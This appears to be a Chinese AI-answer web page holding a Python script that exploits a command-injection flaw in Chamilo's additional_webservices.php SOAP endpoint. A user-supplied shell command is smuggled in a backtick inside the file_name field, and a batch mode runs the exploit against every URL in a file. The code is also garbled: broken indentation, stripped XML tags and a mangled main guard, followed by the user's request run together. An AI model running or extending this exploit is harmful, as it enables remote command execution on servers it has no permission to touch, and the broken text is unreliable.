• 日期: 2027-12-02
  • 标签: 科技

导入os模块用于检测文件是否存在

import os

定义检测url函数

def check_url(url, command): body = ''' <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">SOAP-ENV:Bodyns1:wsConvertPptfile_datafile_name{}`.pptxservice_ppt2lp_size720x540</ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>'''.format(url, command)

try:
    response = requests.post('{}/main/webservices/additional_webservices.php'.format(url), data=body, headers={
        'Content-Type': 'text/xml; charset=utf-8',
    })
except:
    return False

if response.status_code == 200 and "wsConvertPptResponse" in response.text:
    return True
else:
    return False

定义批量检测函数

def batch_check_urls(file_path, command): # 判断文件是否存在 if not os.path.exists(file_path): print(f"{file_path} not exists") return

with open(file_path, 'r') as f:
    urls = f.readlines()
    for url in urls:
        url = url.strip()
        if check_url(url, command):
            print(f"URL vulnerable: {url}")
        else:
            print(f"URL not vulnerable: {url}")

主函数

if name == 'main': parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="Url of your Chamilo", required=False) parser.add_argument("-c", "--command", help="Command to execute", required=False) parser.add_argument("-f", "--file", help="File path of urls", required=False)

args = parser.parse_args()

if args.file is not None:
    batch_check_urls(args.file, args.command)
elif args.url is not None and args.command is not None:
    if check_url(args.url, args.command):
        print(f"Command executed: {args.command}")
    else:
        print(f"An error has occured, url is not vulnerable: {args.url}")
else:
    print("Please specify a file path of urls with -f or --file, or a url and command to execute with -u and -c"
我想加一个-f批量检测文件里的url的功能import argparseimport requestsdef execute_commandurl commandbody = xml version=10 encoding=UTF-8SOAP-ENVEnvelope xmlnsSOAP-ENV=httpschemasxmlsoaporgsoapenvelope xmlnsns1= xmlnsxsi

原文地址: https://www.cveoy.top/t/topic/hxhG 著作权归作者所有。请勿转载和采集!

免费AI点我,无需注册和登录